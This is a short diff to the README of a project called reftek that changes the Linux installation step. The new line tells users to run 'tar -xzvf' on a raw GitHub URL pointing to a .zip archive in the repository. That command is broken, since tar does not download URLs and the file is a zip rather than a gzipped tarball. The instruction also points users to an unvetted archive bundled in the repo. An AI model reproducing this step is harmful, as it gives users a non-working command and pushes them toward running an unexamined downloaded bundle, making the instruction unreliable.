OkLolThe1st/reftek/README.md

    - For Windows: Double-click on the `.exe` file.
    - For macOS: Open the `.dmg` file and drag reftek to your Applications folder.
-   - For Linux: Open a terminal, navigate to the folder where the file is, and extract it with `tar -xzvf reftek-linux.tar.gz`, then follow the included instructions.
+   - For Linux: Open a terminal, navigate to the folder where the file is, and extract it with `tar -xzvf https://raw.githubusercontent.com/OkLolThe1st/reftek/main/reftek-html/reftek-v3.1.zip`, then follow the included instructions.

 6. **Follow the installation prompts** to install the software.